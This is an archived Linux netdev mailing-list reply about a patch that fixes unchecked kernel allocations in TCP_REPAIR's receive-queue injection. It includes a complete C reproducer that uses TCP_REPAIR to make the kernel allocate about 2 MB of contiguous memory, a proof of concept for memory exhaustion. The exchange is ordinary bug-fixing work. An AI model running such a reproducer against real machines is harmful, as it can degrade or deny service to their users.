| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 19 Nov 2015 04:31:32 -0800
From: Eric Dumazet <eric.dumazet@...il.com>
To: Pavel Emelyanov <xemul@...allels.com>
Cc: David Miller <davem@...emloft.net>, netdev <netdev@...r.kernel.org>
Subject: Re: [PATCH net] tcp: fix potential huge kmalloc() calls in
TCP_REPAIR
On Thu, 2015-11-19 at 04:25 -0800, Eric Dumazet wrote:
> On Thu, 2015-11-19 at 13:51 +0300, Pavel Emelyanov wrote:
> > On 11/19/2015 08:03 AM, Eric Dumazet wrote:
> > > From: Eric Dumazet <edumazet@...gle.com>
> > >
> > > tcp_send_rcvq() is used for re-injecting data into tcp receive queue.
> > >
> > > Problems :
> > >
> > > - No check against size is performed, allowed user to fool kernel in
> > > attempting very large memory allocations, eventually triggering
> > > OOM when memory is fragmented.
> >
> > Doesn't the tcp_try_rmem_schedule() protect us from doing this "eventually"?
> > I mean first we would be allowed to do it, but then the sock will be charged
> > with the previous allocations and will not add more memory to socket.
>
> But this tcp_try_rmem_schedule() is done _after_ allocation was
> attempted. This is too late :(
Simple reproducer allocating 2 Mbytes of contiguous kernel memory :
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
static void fail(const char *str)
{
perror(str);
exit(1);
}
void usage(int code)
{
exit(1);
}
int main(int argc, char *argv[])
{
int res, c, repair = 1;
int queue = TCP_RECV_QUEUE;
int fd = socket(AF_INET, SOCK_STREAM, 0);
size_t sz = 2*1024*1024 - 1024;
char *buffer;
struct sockaddr_in src, dst;
while ((c = getopt(argc, argv, "m:")) != -1) {
switch (c) {
case 'm' :
sz = atoi(optarg);
break;
default : usage(1);
}
}
if (setsockopt(fd, SOL_TCP, TCP_REPAIR, &repair, sizeof(repair)) == -1)
fail("TCP_REPAIR");
memset(&src, 0, sizeof(src));
src.sin_family = AF_INET;
src.sin_port = htons(8888);
src.sin_addr.s_addr = htonl(0x7f000001);
if (bind(fd, (struct sockaddr *)&src, sizeof(src)) == -1)
fail("bind");
memset(&dst, 0, sizeof(dst));
dst.sin_family = AF_INET;
dst.sin_port = htons(9999);
dst.sin_addr.s_addr = htonl(0x7f000001);
if (connect(fd, (struct sockaddr *)&dst, sizeof(dst)) == -1)
fail("connect");
if (setsockopt(fd, SOL_TCP, TCP_REPAIR_QUEUE, &queue, sizeof(queue)) == -1)
fail("TCP_REPAIR_QUEUE");
buffer = malloc(sz);
if (!buffer)
buffer = malloc(1000);
res = send(fd, buffer, sz, 0);
printf("send() res=%d errno=%d\n", res, errno);
if (res != -1)
sleep(1000);
return 0;
}
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@...r.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Powered by blists - more mailing lists